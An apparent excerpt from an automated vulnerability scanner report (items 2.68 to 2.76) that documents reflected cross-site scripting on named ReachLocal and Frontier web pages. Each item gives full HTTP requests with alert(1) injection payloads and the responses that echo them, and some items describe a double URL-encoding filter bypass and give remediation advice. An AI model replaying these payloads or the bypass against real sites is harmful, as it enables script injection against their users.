This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net58fcc"><script>alert(1)</script>222f71544b5&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... ass="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net58fcc"><script>alert(1)</script>222f71544b5&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup( ...[SNIP]...
2.68. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [pub_cr_id parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The value of the pub_cr_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d338"><script>alert(1)</script>ad1ca6e1bfb was submitted in the pub_cr_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=86687597482d338"><script>alert(1)</script>ad1ca6e1bfb&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:59 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... 4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=86687597482d338"><script>alert(1)</script>ad1ca6e1bfb&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=23329 ...[SNIP]...
2.69. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_key parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56381"><script>alert(1)</script>70d89b3bb75 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a56381"><script>alert(1)</script>70d89b3bb75&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:56 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:49 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... <a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a56381"><script>alert(1)</script>70d89b3bb75&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landin ...[SNIP]...
2.70. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_track_landing_pages parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a4a6"><script>alert(1)</script>d1455ccc13a was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=12a4a6"><script>alert(1)</script>d1455ccc13a HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:01 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... 2&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=12a4a6"><script>alert(1)</script>d1455ccc13a" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary ...[SNIP]...
2.71. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [scid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d28"><script>alert(1)</script>56378b08b00 was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693b9d28"><script>alert(1)</script>56378b08b00&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... <a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693b9d28"><script>alert(1)</script>56378b08b00&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26i ...[SNIP]...
2.72. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [se_refer parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The value of the se_refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 309b3"><script>alert(1)</script>4eadda684d was submitted in the se_refer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice309b3"><script>alert(1)</script>4eadda684d&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:05 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3261
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... _key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice309b3"><script>alert(1)</script>4eadda684d&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971 ...[SNIP]...
2.73. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [tc parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b54e"><script>alert(1)</script>9fb0f72f32a was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=110906045201112716b54e"><script>alert(1)</script>9fb0f72f32a&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:54 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:47 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... <a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=110906045201112716b54e"><script>alert(1)</script>9fb0f72f32a&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bserv ...[SNIP]...
2.74. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /AgentOrdering/CustomAppTabInfo/tabs.css
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a54%2527%253balert%25281%2529%252f%252f24407793c50 was submitted in the REST URL parameter 1. This input was echoed as 59a54';alert(1)//24407793c50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering59a54%2527%253balert%25281%2529%252f%252f24407793c50/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering59a54';alert(1)//24407793c50/CustomAppTabInfo/tabs.css');//]]> ...[SNIP]...
2.75. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /AgentOrdering/CustomAppTabInfo/tabs.css
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760b6%2527%253balert%25281%2529%252f%252f951f3ddd7d3 was submitted in the REST URL parameter 2. This input was echoed as 760b6';alert(1)//951f3ddd7d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering/CustomAppTabInfo760b6%2527%253balert%25281%2529%252f%252f951f3ddd7d3/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering/CustomAppTabInfo760b6';alert(1)//951f3ddd7d3/tabs.css');//]]> ...[SNIP]...
2.76. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /AgentOrdering/CustomAppTabInfo/tabs.css
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aeffb%2527%253balert%25281%2529%252f%252f9b1214b2e90 was submitted in the REST URL parameter 3. This input was echoed as aeffb';alert(1)//9b1214b2e90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering/CustomAppTabInfo/tabs.cssaeffb%2527%253balert%25281%2529%252f%252f9b1214b2e90 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787
